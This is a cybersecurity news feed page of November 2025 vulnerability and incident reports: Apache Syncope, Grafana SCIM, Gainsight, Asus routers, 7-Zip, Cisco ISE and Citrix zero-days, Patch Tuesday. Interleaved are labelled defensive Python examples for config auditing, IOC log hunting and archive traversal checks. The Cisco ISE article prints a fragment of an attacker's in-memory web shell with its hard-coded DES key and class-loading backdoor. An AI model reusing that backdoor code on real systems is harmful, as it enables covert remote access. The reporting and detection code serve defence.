Vulnerabilities – The Cyber Express Trending Cybersecurity News, Updates, Magazine and More.
- OIG Audit Finds Commerce Department Failing to Fully Secure Public-Facing Systems by Ashish Khaitan on November 26, 2025 at 10:00 am
The Department of Commerce’s vulnerability disclosure program (VDP), designed to protect its public-facing information technology systems, has been deemed “not fully effective” according to a recent audit conducted by the department’s Office of Inspector General (OIG). The audit highlights several shortcomings in the department’s approach to vulnerability disclosure and remediation.

The Commerce Department established its VDP in response to a directive from the Cybersecurity and Infrastructure Security Agency (CISA). This directive required all federal agencies to implement a vulnerability disclosure policy that allows members of the public to identify and report security vulnerabilities in internet-accessible government systems. Such programs are considered a critical component of federal cybersecurity efforts, enabling agencies to leverage external expertise to safeguard digital infrastructure.

However, the OIG’s audit, formally titled Audit of the Department’s Vulnerability Reporting and Resolution Program (Report Number OIG-26-002-A), found that the department’s program fell short in several key areas. “The Department established a vulnerability disclosure program; however, it was not fully effective,” the report states. Specifically, the audit found that not all internet-accessible systems were included in the VDP, testing guidelines restricted the tools public security researchers could use, reported vulnerabilities were not always fully remediated, and remediation deadlines were frequently missed.

Gaps in Remediation and Vulnerability Reporting

The OIG reviewed 71 resolved vulnerability disclosures and found that only 57 (80%) had been fully remediated, leaving 14 (20%) unresolved. Moreover, the audit indicated that since 2023, the department failed to meet established deadlines for remediating vulnerabilities approximately 35% of the time.
“Without an effective vulnerability disclosure program, the Department cannot protect its internet-accessible systems, leaving them susceptible to potential compromise and exploitation,” the report warned.

The audit also highlighted structural issues with the VDP. The department limited its scope to 64 internet-accessible websites, excluding 22 department-owned or operated sites. Additionally, the contractor managing the VDP portal prohibited the use of automated scanners, tools widely used by public security researchers to detect vulnerabilities.

OIG Recommendations and Next Steps

To address these deficiencies, the OIG issued three recommendations. First, the department should revise its VDP testing scope to align with CISA’s Binding Operational Directive 20-01, which emphasizes including all internet-accessible systems in vulnerability disclosure efforts. Second, the department should update and implement standard operating procedures for vulnerability reporting and resolution to ensure comprehensive remediation across affected systems. Finally, the OIG recommended establishing an automated system to coordinate communication between contractors and bureaus and prompt timely action on delayed remediation efforts.

The Importance of Vulnerability Disclosure Programs (VDPs)

The OIG audit highlights the critical role of vulnerability disclosure programs (VDPs) in federal cybersecurity. CISA has emphasized that a strong VDP allows agencies to detect weaknesses before they are exploited, ensuring that vulnerabilities reported by security researchers are systematically assessed, tracked, and remediated. Organizations looking to strengthen their cybersecurity posture can leverage platforms like Cyble, a world-leading AI-powered threat intelligence solution. Cyble provides real-time visibility into exposed assets, vulnerabilities, and emerging threats, helping organizations proactively manage risk.
- Apache Syncope Passwords at Risk from Newly Disclosed CVE-2025-65998 by Ashish Khaitan on November 25, 2025 at 12:25 pm
A critical security flaw has been uncovered in Apache Syncope, the widely used open-source identity management system, potentially putting organizations at risk of exposing sensitive password information. Tracked as CVE-2025-65998, the vulnerability was publicly disclosed on November 24, 2025, by Francesco Chicchiriccò through the official Apache Syncope user mailing list. Credit for discovering the issue goes to Clemens Bergmann of the Technical University of Darmstadt.

Understanding the CVE-2025-65998 Vulnerability

The vulnerability specifically affects Apache Syncope instances configured to store user passwords in their internal database using AES encryption. While this configuration is not enabled by default, organizations that activate it may unknowingly introduce a significant security risk. The system relies on a hard-coded AES key embedded directly in the application’s source code. This design oversight means that any attacker who gains access to the internal database can easily decrypt stored password values, recovering them in plaintext. This compromise poses a severe risk for account security, allowing unauthorized access, privilege escalation, and lateral movement within affected networks.

It is important to note that this flaw only affects passwords stored using the internal AES encryption feature. Other database attributes encrypted through key management mechanisms remain unaffected, as they use separate AES keys and proper encryption handling.

Affected Versions

Research indicates that multiple versions of Apache Syncope are vulnerable to CVE-2025-65998, including:

  - Apache Syncope (org.apache.syncope.core:syncope-core-spring) 2.1 through 2.1.14
  - Apache Syncope (org.apache.syncope.core:syncope-core-spring) 3.0 through 3.0.14
  - Apache Syncope (org.apache.syncope.core:syncope-core-spring) 4.0 through 4.0.2

Organizations running these versions are strongly advised to upgrade to patched releases—version 3.0.15 or 4.0.3—to mitigate the risk.
The update replaces the vulnerable hard-coded AES key approach with a more secure key management process, ensuring that password data cannot be trivially decrypted even if the database is compromised.

Potential Impact

Exploitation of CVE-2025-65998 can have serious operational consequences. Once an attacker accesses the internal database, all passwords stored with the default AES encryption method can be decrypted, exposing users’ credentials. This breach can lead to unauthorized account logins, elevated privileges, and potential internal movement across systems, amplifying the threat to organizational security.

Francesco Chicchiriccò, in the advisory posted to the Apache Syncope mailing list, emphasized the importance of upgrading affected systems promptly: “Apache Syncope can be configured to store user password values in the internal database with AES encryption, though this is not the default option. When AES is configured, the default key value, hard-coded in the source code, is always used. This allows a malicious attacker, once obtaining access to the internal database content, to reconstruct the original cleartext password values.”

Clemens Bergmann of the Technical University of Darmstadt is credited with identifying this security gap, bringing attention to the risks associated with embedded AES encryption keys without proper key management.

Mitigation Steps

Administrators should promptly review their Apache Syncope deployments. Systems using AES encryption for internal password storage must be updated to versions 3.0.15 or 4.0.3, and key management practices should be strengthened to avoid hard-coded keys. Cyble can help organizations proactively identify exposed assets and vulnerabilities, providing AI-powered threat intelligence and automated recommendations to prevent credential compromise. Protect your organization from vulnerabilities like CVE-2025-65998.
- Grafana Flags Maximum-Severity SCIM Vulnerability Enabling Privilege Escalation by Ashish Khaitan on November 24, 2025 at 11:12 am
Grafana Labs has issued a warning regarding a maximum-severity security flaw, identified as CVE-2025-41115, affecting its Enterprise product. The vulnerability can allow attackers to impersonate administrators or escalate privileges if certain SCIM (System for Cross-domain Identity Management) settings are enabled.

According to the company, the issue arises only when SCIM provisioning is activated and configured. Specifically, both the enableSCIM feature flag and the user_sync_enabled option must be set to true. Under these conditions, a malicious or compromised SCIM client could create a user with a numeric externalId that directly maps to an internal account, potentially even an administrative account.

SCIM Mapping Flaw (CVE-2025-41115) Enables Impersonation Risks

In SCIM systems, the externalId attribute functions as a bookkeeping field used by identity providers to track user records. Grafana Labs’ implementation mapped this value directly to the platform’s internal user.uid. Because of this design, a numeric external ID such as “1” could be interpreted as an existing Grafana account. This behavior opens a door for impersonation or privilege escalation, enabling unauthorized users to assume the identity of legitimate internal accounts.

Grafana Labs notes in its documentation that SCIM is intended to simplify automated provisioning and management of users and groups, particularly for organizations relying on SAML authentication. The feature, available in Grafana Enterprise and certain Grafana Cloud plans, remains in Public Preview. As a result, breaking changes may occur, and administrators are encouraged to test the feature thoroughly in non-production environments before deployment.

SAML Alignment Required to Prevent Authentication Mismatches

A major security requirement highlighted by Grafana Labs involves the alignment between the SCIM externalId and the identifier used in SAML authentication.
SCIM provisioning relies on a stable identity provider attribute, such as Entra ID’s user.objectid, which becomes the external ID in Grafana. SAML authentication must use the same unique identifier, delivered through a SAML claim, to ensure proper account linkage.

If these identifiers do not match, Grafana may fail to associate authenticated SAML sessions with the intended SCIM-provisioned accounts. This mismatch can allow attackers to generate crafted SAML assertions that result in unauthorized access or impersonation. The company recommends using the assertion_attribute_external_uid setting to guarantee that Grafana reads the precise identity claim required to maintain secure user associations.

To reduce risk, Grafana requires organizations to use the same identity provider for both user provisioning and authentication. Additionally, the SAML assertion exchange must include the correct userUID claim to ensure the system can link the session to the appropriate SCIM entry.

Configuration Requirements, Supported Workflows, and Automation Capabilities

Administrators can set up SCIM in Grafana through the user interface, configuration files, or infrastructure-as-code tools such as Terraform. The UI option, available to Grafana Cloud users, applies changes without requiring a restart and allows more controlled access through restricted authentication settings.

Grafana’s SCIM configuration includes options for enabling user synchronization (user_sync_enabled), group synchronization (group_sync_enabled), and restricting access for accounts not provisioned through SCIM (reject_non_provisioned_users). Group sync cannot operate alongside Team Sync, though user sync can. Supported identity providers include Entra ID and Okta.

SCIM provisioning streamlines user lifecycle tasks by automating account creation, updates, deactivation, and team management, reducing manual administrative work and improving security.
Grafana notes that SCIM offers more comprehensive, near real-time automation than alternatives such as Team Sync, LDAP Sync, Role Sync, or Org Mapping. Grafana Labs is urging organizations to review their SCIM and SAML identifier mappings immediately, warning that inconsistencies may lead to unauthorized access scenarios tied to CVE-2025-41115. In parallel, cybersecurity intelligence leaders such as Cyble continue tracking identity-related risks and misconfigurations across global environments. Security teams looking to strengthen visibility, detect threats earlier, and reduce exposure can explore Cyble’s capabilities, book a free demo to see how Cyble’s AI-driven threat intelligence enhances defense across cloud, endpoints, and identity systems.
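
The two checks the Grafana article implies, as an added example (not Grafana's code and not part of the original article): it audits a configuration for the settings tied to CVE-2025-41115 and reviews SCIM create-user bodies for purely numeric externalId values. The option names come from the article; the INI section names, the sample configuration and the sample SCIM bodies are assumptions constructed for illustration.

```python
import configparser
import re

# Constructed grafana.ini fragment. Option names come from the article; the
# section names ([feature_toggles], [auth.scim], [auth.saml]) are assumptions.
SAMPLE_INI = """\
[feature_toggles]
enableSCIM = true

[auth.scim]
user_sync_enabled = true
group_sync_enabled = false

[auth.saml]
enabled = true
"""

# Constructed SCIM "create user" bodies, as a provisioning audit log might hold them.
SAMPLE_CREATES = [
    {"userName": "alice@example.test", "externalId": "6f1c2a9e-0b7d-4c55-9a31-2d8e5f0c7b14"},
    {"userName": "svc-sync@example.test", "externalId": "1"},
    {"userName": "bob@example.test", "externalId": 42},
]


def _enabled(cfg, section, option):
    """True only when the option exists and is literally 'true'."""
    return cfg.has_option(section, option) and cfg.get(section, option).strip().lower() == "true"


def audit_scim_config(ini_text):
    """Return findings for the conditions the article ties to CVE-2025-41115."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.optionxform = str  # keep option names case-sensitive (enableSCIM)
    # A synthetic header lets files that start with section-less keys parse.
    cfg.read_string("[_root]\n" + ini_text)
    findings = []
    if _enabled(cfg, "feature_toggles", "enableSCIM") and _enabled(cfg, "auth.scim", "user_sync_enabled"):
        findings.append("enableSCIM and user_sync_enabled are both true: SCIM user provisioning is active")
        uid_attr = cfg.get("auth.saml", "assertion_attribute_external_uid", fallback="").strip()
        if not uid_attr:
            findings.append("assertion_attribute_external_uid is not set: SAML/SCIM identifier alignment is not pinned")
    return findings


def numeric_external_ids(creates):
    """Return userNames whose externalId is purely numeric and could map onto an internal uid."""
    flagged = []
    for body in creates:
        ext = body.get("externalId")
        if isinstance(ext, bool):
            continue  # bool is an int subclass in Python; not an identifier
        if isinstance(ext, int) or (isinstance(ext, str) and re.fullmatch(r"[0-9]+", ext.strip())):
            flagged.append(body.get("userName"))
    return flagged


if __name__ == "__main__":
    for finding in audit_scim_config(SAMPLE_INI):
        print("config:", finding)
    for user in numeric_external_ids(SAMPLE_CREATES):
        print("review SCIM-created user with numeric externalId:", user)
```
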
- Salesforce Confirms Wider Impact in Ongoing Gainsight Security Incident by Samiksha Jain on November 24, 2025 at 10:46 am
Salesforce has issued a new update on the ongoing Salesforce Gainsight security incident, confirming additional details about the unusual activity detected across Gainsight-published applications connected to the CRM platform. The company reiterated that the incident stemmed from the app’s external integration with Salesforce rather than any vulnerability in the Salesforce core platform.

Salesforce Confirms Expanded Investigation

In its latest advisory, Salesforce stated that the unusual activity affecting Gainsight applications may have enabled unauthorized access to certain customers’ Salesforce data through the app-to-Salesforce connection. As part of its precautionary measures, Salesforce revoked all active access and refresh OAuth tokens associated with Gainsight-published applications and removed the apps from its AppExchange.

While initial communication referenced only three affected customers, Salesforce confirmed on November 21 that the list has expanded, and all newly identified impacted customers have been notified directly. Salesforce emphasized that a broader investigation is underway and continues to provide updates on its official Help portal.

Gainsight Products and Connectors Temporarily Impacted

According to Gainsight’s latest communication, several of its products, including Gainsight CS, Community (CC), Northpass (CE), Skilljar (SJ), and Staircase (ST), have been affected by Salesforce’s precautionary disconnection. Although the products remain operational, they are currently unable to read or write data to Salesforce.

In addition, several third-party connectors integrated with Gainsight, such as Gong.io, Zendesk, and HubSpot, have been temporarily disabled by their respective vendors out of an abundance of caution. Gainsight urged customers to rotate their S3 keys if they have not done so since November 20, 2025, as part of the secure log retrieval process.

No Indication of Salesforce Platform Vulnerability

Salesforce reiterated that there is no evidence suggesting the issue originated from a flaw within the Salesforce platform itself. Instead, the activity appears tied to the external OAuth-based connection between Gainsight applications and Salesforce environments.

Crucially, Salesforce confirmed that while the OAuth tokens have been revoked, historical audit trails and logs remain intact, enabling full customer-led investigation efforts. The company also strongly encouraged customers to conduct thorough log reviews using Setup Audit Trail, Event Monitoring logs, and API activity records. Salesforce referenced the Salesforce Log Analysis Guide to support customers in assessing potential compromise indicators.

Indicators of Compromise Published

As part of its transparency efforts, Salesforce shared a list of Indicators of Compromise (IOCs) associated with the threat activity. These include several user agents—such as python-requests/2.32.3 and Salesforce-Multi-Org-Fetcher/1.0—and dozens of IP addresses linked to suspicious access attempts.

Gainsight echoed Salesforce’s recommendations and is conducting its own forensic review with support from independent investigators. Both organizations confirmed that the Salesforce Gainsight security incident remains under active investigation. Gainsight has published a detailed timeline and continues to coordinate with Salesforce to determine the full impact. Customers seeking assistance have been directed to Salesforce Help and Gainsight Support for further updates.
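
A log review of the kind the advisory asks customers to run, as an added example (not Salesforce or Gainsight tooling and not part of the original article): it matches the two user agents named above, plus an IP list, against an exported event log and summarises hits per user. The CSV column names, the sample rows and the IP address are constructed assumptions; the article does not list the published IP addresses.

```python
import csv
import io

# User agents named in the article as published indicators.
UA_IOCS = ("python-requests/2.32.3", "Salesforce-Multi-Org-Fetcher/1.0")
# Placeholder from the TEST-NET-3 documentation range; load the real list
# from the vendor advisory.
IP_IOCS = frozenset({"203.0.113.45"})

# Constructed log export. Column names are assumptions; map them to your export.
SAMPLE_LOG = """\
TIMESTAMP_DERIVED,USER_ID,CLIENT_IP,USER_AGENT,URI
2025-11-18T02:11:04Z,005A,198.51.100.7,Mozilla/5.0 (Windows NT 10.0; Win64; x64),/lightning/page/home
2025-11-18T02:14:37Z,005B,203.0.113.45,Salesforce-Multi-Org-Fetcher/1.0,/services/data/query
2025-11-18T02:15:02Z,005B,203.0.113.45,Salesforce-Multi-Org-Fetcher/1.0,/services/data/query
2025-11-19T09:40:11Z,005C,198.51.100.23,python-requests/2.32.3,/services/data/sobjects
2025-11-19T09:41:00Z,005C,198.51.100.23,python-requests/2.31.0,/services/data/sobjects
"""


def hunt(csv_text, ua_iocs=UA_IOCS, ip_iocs=IP_IOCS):
    """Summarise IOC hits per user: event count, time window, matched indicators.

    A python-requests user agent is also sent by legitimate integrations, so a
    hit is a lead for triage against the time window, not a verdict.
    """
    summary = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        agent = (row.get("USER_AGENT") or "").lower()
        reasons = {"ua:" + ioc for ioc in ua_iocs if ioc.lower() in agent}
        if row.get("CLIENT_IP") in ip_iocs:
            reasons.add("ip:" + row["CLIENT_IP"])
        if not reasons:
            continue
        ts = row.get("TIMESTAMP_DERIVED", "")
        entry = summary.setdefault(
            row.get("USER_ID", "unknown"),
            {"events": 0, "first": ts, "last": ts, "reasons": set()},
        )
        entry["events"] += 1
        # ISO-8601 UTC timestamps in one format sort correctly as strings.
        entry["first"] = min(entry["first"], ts)
        entry["last"] = max(entry["last"], ts)
        entry["reasons"] |= reasons
    return summary


if __name__ == "__main__":
    for user, hit in sorted(hunt(SAMPLE_LOG).items()):
        print(user, hit["events"], hit["first"], hit["last"], sorted(hit["reasons"]))
```
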
- CERT-In Warns of Critical Asus Router Flaw Exposing Millions in India by Ashish Khaitan on November 21, 2025 at 6:58 am
According to the Indian Computer Emergency Response Team (CERT-In), thousands of households, small offices, and service providers across the country may already be at risk due to a newly uncovered authentication bypass flaw tracked as CVE-2025-59367. India’s national cybersecurity agency has issued a security alert after identifying a severe vulnerability in several widely used Asus DSL-series WiFi routers.

The warning, published in CERT-In Vulnerability Note CIVN-2025-0322, outlines how remote attackers could infiltrate specific router models without user involvement. The affected devices include the Asus DSL-AC51, DSL-N16, and DSL-AC750, three routers that are common in home and SOHO environments relying on DSL internet connections.

CERT-In states that the flaw enables an attacker to bypass login controls and gain unrestricted access to the router’s administrative interface. Once the router is compromised, the intruder could alter configuration settings, observe or reroute internet traffic, intercept personal or financial information, or even compromise connected devices. The agency describes the risks to confidentiality, integrity, and availability as “critical.”

CVE-2025-59367 Enables Authentication Bypass and Network Compromise

In its advisory, CERT-In explains that a “vulnerability has been reported in ASUS DSL series routers that allows a remote attacker to gain unauthorized access into the affected system.” The agency notes that the issue affects the DSL-AC51, DSL-N16, and DSL-AC750 models and warns that successful exploitation could result in unauthorized access, modification of configuration parameters, access to sensitive information transmitted through the router, and compromise of connected systems.

The advisory is targeted at IT and network administrators, SOC analysts, SMB operators, home and SOHO users, and managed service providers or ISPs, highlighting the widespread nature of the vulnerability.
CERT-In’s assessment reiterates that the authentication bypass flaw, identified as CVE-2025-59367, poses direct threats to data confidentiality and system integrity. The report also details the broader context of the Asus DSL series line, explaining that these devices serve as integrated modem-router units for environments dependent on DSL connections. Because these routers often operate as central networking hubs, any breach may expose all devices and data flowing through the network.

The advisory includes a directive: “Apply appropriate security updates as mentioned in: https://www.asus.com/security-advisory.” CERT-In urges users to immediately install the firmware patches that Asus has begun releasing for the affected models. The agency also recommends that users change default passwords, disable remote management functions unless necessary, and review router security settings for any misconfigurations. Monitoring router logs for abnormalities has also been emphasized as a crucial preventive step.

Conclusion

Asus rolls out patches for the authentication bypass flaw CVE-2025-59367; CERT-In is urging all users of affected DSL-series routers to apply updates immediately. The agency has reiterated the seriousness of the vulnerability and advised users to review their router settings, update firmware through the Asus security advisory page, and remain alert to suspicious activity.

Incidents like CVE-2025-59367 show how essential it is for organizations to have reliable insight into new vulnerabilities. Cyble supports this need through detailed vulnerability intelligence, helping teams identify high-risk issues, track exploit activity, and prioritize remediation across assets and products. Its intelligence goes beyond standard CVE and NVD listings, offering context on exploits, attack methods, and threat actor discussions. Schedule a personalized demo with Cyble to assess how its intelligence platform can support your security operations.
- Critical 7-Zip Vulnerability CVE-2025-11001 Prompts NHS Cyber Alert by Ashish Khaitan on November 20, 2025 at 1:15 pm
A newly discovered security flaw, identified as CVE-2025-11001, affects users across both public and private sectors. The vulnerability, affecting all versions of 7-Zip before 25.00, allows attackers to execute malicious code remotely, potentially compromising critical systems. NHS Digital issued a cyber alert urging organizations and users to take immediate action.

Details of the CVE-2025-11001 Vulnerability

CVE-2025-11001 is classified as a file-parsing directory traversal remote code execution vulnerability. With a CVSS score of 7.0, the flaw is considered high severity. Exploitation occurs through 7-Zip’s handling of symbolic links during the extraction of archive files. By crafting malicious archives, attackers can manipulate 7-Zip to write files outside the intended extraction directory. This misbehavior enables the placement of executable files in sensitive system locations, which can then be triggered to execute arbitrary code.

Security researchers have released a proof-of-concept (PoC) exploit demonstrating how CVE-2025-11001 can be leveraged. While the PoC does not constitute a fully weaponized attack, it lowers the barrier for cybercriminals, making unpatched systems increasingly vulnerable.

Impact and Threat Assessment

All 7-Zip versions before 25.00 are at risk, which includes a vast number of enterprise systems, government agencies, and personal computers. The NHS Digital cybersecurity team has classified this issue as Threat ID CC-4719 with medium severity, highlighting the urgent need for patching.

Although initial reports suggested active exploitation in the wild, a subsequent update on November 20, 2025, clarified that no confirmed exploitation of CVE-2025-11001 has been observed by NHS England’s National Cyber Security Operations Centre (CSOC). The National CSOC did confirm the existence of the public PoC exploit and indicated that potential exploitation remains likely in the future if systems are left unpatched.
Given the deployment of 7-Zip across multiple environments, the potential attack surface is significant. A successful attack could allow unauthorized access to sensitive systems and facilitate the deployment of additional malware payloads.

Remediation and Recommendations

In response to CVE-2025-11001, 7-Zip released version 25.00, which addresses the vulnerability and mitigates the risk of remote code execution via malicious archive files. Organizations and individual users are strongly advised to upgrade immediately. Delaying the update leaves systems exposed to potential threats that could be exploited once more attacks emerge.

System administrators should prioritize updating all endpoints and servers running vulnerable 7-Zip versions. Implementing this patch eliminates the directory traversal flaw, effectively neutralizing the possibility of arbitrary code execution through symbolic link abuse.

Conclusion

CVE-2025-11001 is a high-severity 7-Zip vulnerability. While NHS systems haven’t seen confirmed exploitation, the public proof-of-concept raises the risk. Organizations should update to 7-Zip 25.00 or later and report incidents to NHS Digital. To stay protected from threats like CVE-2025-11001, Cyble provides AI-driven vulnerability intelligence, helping organizations prioritize and patch critical risks before they are exploited. Schedule a personalized demo with Cyble to protect your systems today.
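
A pre-extraction audit for the symbolic-link traversal pattern described in the 7-Zip article, as an added example (not 7-Zip's code and not part of the original article): it inspects a ZIP archive without extracting it and flags symlink entries whose target resolves outside the extraction directory, plus entries that would be written through a symlink. It assumes ZIP archives with Unix-style symlink entries; the sample archive and all entry names are constructed.

```python
import io
import posixpath
import re
import stat
import zipfile


def _is_abs(path):
    """Absolute in either POSIX ('/x') or Windows drive ('C:/x') form."""
    return path.startswith("/") or re.match(r"[A-Za-z]:", path) is not None


def _escapes(path):
    """True if the path is absolute or climbs above the extraction root."""
    path = path.replace("\\", "/")
    if _is_abs(path):
        return True
    norm = posixpath.normpath(path)
    return norm == ".." or norm.startswith("../")


def audit_zip(data):
    """Return (entry, reason) findings for a ZIP held in memory; nothing is extracted."""
    findings = []
    links = set()  # names of symlink entries seen so far
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename.replace("\\", "/").rstrip("/")
            if _escapes(name):
                findings.append((name, "entry path leaves the extraction root"))
                continue
            parts = name.split("/")
            parent = next(
                ("/".join(parts[:i]) for i in range(1, len(parts)) if "/".join(parts[:i]) in links),
                None,
            )
            if parent is not None:
                findings.append((name, "would be written through symlink '%s'" % parent))
            # The Unix file mode is stored in the high 16 bits of external_attr.
            if stat.S_ISLNK(info.external_attr >> 16):
                links.add(name)
                target = zf.read(info).decode("utf-8", "replace").replace("\\", "/")
                # Relative targets resolve against the link's own directory.
                resolved = posixpath.join(posixpath.dirname(name), target)
                if _is_abs(target) or _escapes(resolved):
                    findings.append((name, "symlink target '%s' resolves outside the extraction root" % target))
    return findings


def build_sample_zip():
    """Constructed test archive: one benign link, one link that climbs out of the root."""
    def link(name):
        entry = zipfile.ZipInfo(name)
        entry.create_system = 3  # Unix, so the mode bits are meaningful
        entry.external_attr = (stat.S_IFLNK | 0o777) << 16
        return entry

    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "hello")
        zf.writestr(link("docs/cache"), "../../outside")
        zf.writestr("docs/cache/note.txt", "data")
        zf.writestr(link("docs/latest"), "readme.txt")
    return buf.getvalue()


if __name__ == "__main__":
    for entry, reason in audit_zip(build_sample_zip()):
        print(entry, "->", reason)
```

Such an audit complements the upgrade to 7-Zip 25.00 on systems that unpack untrusted archives automatically; it does not replace the patch.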
- Zero-Day Vulnerabilities in Cisco and Citrix Targeted by APT Group, Amazon Confirms by Ashish Khaitan on November 13, 2025 at 8:08 am
Amazon’s threat intelligence division has revealed a cyber-espionage campaign involving an advanced persistent threat (APT) group exploiting previously undisclosed zero-day vulnerabilities in systems from Cisco and Citrix. The investigation showed that the attackers specifically targeted critical identity and network access control infrastructure, the components enterprises rely on to manage authentication and enforce security policies across their networks.

The initial discovery came from Amazon’s MadPot honeypot service, which detected exploitation attempts of the Citrix “Bleed Two” vulnerability, now tracked as CVE-2025-5777, before it had been made public. This early detection confirmed that the APT had been using the flaw as a zero-day vulnerability. Further analysis linked the same threat actor to another zero-day vulnerability within Cisco Identity Service Engine (ISE).

Amazon shared details of a suspicious payload with Cisco, which led to the identification of a flaw in the deserialization logic of an undocumented Cisco ISE endpoint. The vulnerability, now designated CVE-2025-20337, allowed pre-authentication remote code execution, granting attackers administrator-level access to affected systems. What raised additional alarm was that this exploitation occurred before Cisco had assigned a CVE number or released patches.

Deployment of a Custom Web Shell

Following the successful compromise of targeted systems, the threat actor deployed a custom-built web shell disguised as a legitimate Cisco ISE component called IdentityAuditAction. Unlike typical off-the-shelf malware, this backdoor was tailored specifically for Cisco ISE environments. Amazon’s investigation revealed that the web shell operated entirely in-memory, leaving minimal traces for forensic analysis.
It used Java reflection to inject itself into active threads, registered as an HTTP listener on the Tomcat server to intercept all HTTP requests, and encrypted its communication with DES encryption using non-standard Base64 encoding. Accessing the shell required knowledge of specific HTTP headers, further obscuring its presence.

The following snippet from the deserialization routine demonstrates the actor’s authentication mechanism for accessing the backdoor:

    if (matcher.find()) {
        // Undo the character substitution that makes the Base64 non-standard
        requestBody = matcher.group(1).replace("*", "a").replace("$", "l");
        Cipher encodeCipher = Cipher.getInstance("DES/ECB/PKCS5Padding");
        decodeCipher = Cipher.getInstance("DES/ECB/PKCS5Padding");
        // Hard-coded 8-byte DES key shared by both directions
        byte[] key = "d384922c".getBytes();
        encodeCipher.init(1, new SecretKeySpec(key, "DES")); // 1 = Cipher.ENCRYPT_MODE
        decodeCipher.init(2, new SecretKeySpec(key, "DES")); // 2 = Cipher.DECRYPT_MODE
        byte[] data = Base64.getDecoder().decode(requestBody);
        data = decodeCipher.doFinal(data);
        ByteArrayOutputStream arrOut = new ByteArrayOutputStream();
        if (proxyClass == null) {
            // First request: the decrypted bytes are loaded as a class
            proxyClass = this.defineClass(data);
        } else {
            // Later requests: the loaded class is driven through equals()/toString() calls
            Object f = proxyClass.newInstance();
            f.equals(arrOut);
            f.equals(request);
            f.equals(data);
            f.toString();
        }
    }

Defensive Measures for CVE-2025-20337 and CVE-2025-5777

The simultaneous exploitation of CVE-2025-20337 and CVE-2025-5777 demonstrates the growing trend of APTs focusing on identity and access control infrastructure as high-value targets. According to Amazon, the attacks were indiscriminate and internet-facing, meaning any unpatched or exposed systems were at risk during the campaign.

The “patch-gap” exploitation, attacking systems in the window before vendors can issue fixes, highlights a persistent challenge in enterprise cybersecurity. Such tactics are commonly used by well-funded threat groups that possess advanced research capabilities or access to undisclosed vulnerability data. Amazon emphasized that even well-maintained systems can fall victim to pre-authentication zero-days, underscoring the need for defense-in-depth strategies.
Security teams are advised to:

  - Restrict access to privileged security appliance endpoints like Cisco ISE and Citrix management portals through network segmentation and firewalls.
  - Closely monitor for anomalous activity, such as unrecognized HTTP listeners, unusual in-memory processes, or encryption anomalies.
  - Stay current with vendor advisories and threat intelligence feeds regarding emerging zero-day vulnerabilities.
  - Minimize public internet exposure of critical identity and network control systems, routing access through VPNs or isolated management interfaces.

Conclusion

Amazon’s findings reveal how today’s threat actors are targeting identity and access systems as key entry points. By exploiting CVE-2025-5777 in Citrix and CVE-2025-20337 in Cisco ISE, attackers demonstrated both precision and intent. Cyble helps enterprises stay ahead of such threats with its advanced Vulnerability Management platform. By monitoring emerging zero-days, prioritizing patches by risk, and offering deep insights into active exploits, Cyble empowers security teams to act before attackers do. Schedule a demo to discover how its AI-driven intelligence can strengthen your defense against modern cyber threats.
- Microsoft Patch Tuesday November 2025: Fixes 63 Security Flaws and One Zero-Day Exploit by Ashish Khaitan on November 12, 2025 at 6:03 am
Microsoft’s November Patch Tuesday release for 2025 has delivered fixes for 63 security flaws across its software portfolio, including one zero-day vulnerability already being exploited in the wild. The company’s monthly update also contains four “Critical” vulnerabilities, two involving remote code execution (RCE), one linked to privilege escalation, and another tied to information disclosure.

This month’s update addresses vulnerabilities across a wide range of Microsoft products and services. Although the number of vulnerabilities is lower compared to recent months, the presence of an active zero-day makes November’s cycle critical for administrators. Microsoft noted that some of the “Important” rated flaws could still be leveraged in complex attack chains, particularly those affecting widely deployed components like Office, Windows Kernel, and Azure services.

Actively Exploited Zero-Day: CVE-2025-62215

The most urgent issue this month is CVE-2025-62215, an Elevation of Privilege vulnerability in the Windows Kernel. According to Microsoft, the flaw arises from a race condition that allows an authenticated attacker to gain SYSTEM-level privileges on affected systems. In Microsoft’s technical explanation, “concurrent execution using a shared resource with improper synchronization” could let an attacker win a race condition and escalate privileges locally.

This vulnerability was discovered by the Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC). While the company has confirmed that it is being exploited in the wild, it has not provided details about the attack methods or affected threat actors.

The vulnerability highlights a recurring challenge for Windows systems: race conditions within kernel operations can provide attackers with direct pathways to full administrative control if not properly mitigated. Patching this CVE should therefore be a top priority for enterprise and government environments.

Other High-Severity CVEs and Products Affected

Beyond the zero-day, four additional vulnerabilities have been classified as Critical. These include remote code execution vulnerabilities in components like Microsoft Office and Visual Studio, which could allow attackers to execute malicious code if users open specially crafted files or interact with compromised projects.

  - CVE-2025-62199: A critical RCE vulnerability in Microsoft Office that can trigger upon viewing or opening a malicious document. This flaw is particularly dangerous because it can be exploited through the Outlook Preview Pane, requiring no additional user interaction.
  - CVE-2025-60724: A heap-based buffer overflow in the Microsoft Graphics Component (GDI+) that could potentially allow remote code execution across multiple applications.
  - CVE-2025-62214: A Visual Studio CoPilot Chat extension flaw enabling remote code execution through a complex multi-stage exploitation chain involving prompt injection and build triggering.
  - CVE-2025-59499: An elevation of privilege issue in Microsoft SQL Server that enables attackers to execute arbitrary Transact-SQL commands with elevated permissions.

The November Patch Tuesday also covers vulnerabilities across a variety of Microsoft services, including Azure Monitor Agent, Windows DirectX, Windows OLE, Dynamics 365, OneDrive for Android, and several networking components such as WinSock and RRAS (Routing and Remote Access Service).

While five of these vulnerabilities are rated “Critical,” most are considered “Important,” reflecting Microsoft’s evaluation of exploitation complexity and impact. Nonetheless, even lower-rated CVEs can pose severe threats when combined with social engineering or used in chained attacks.

Windows 11 Updates and Lifecycle Changes

Alongside security fixes, the November 2025 Windows 11 Patch Tuesday (build 26200.7121, update KB5068861) introduces new features and UI enhancements.
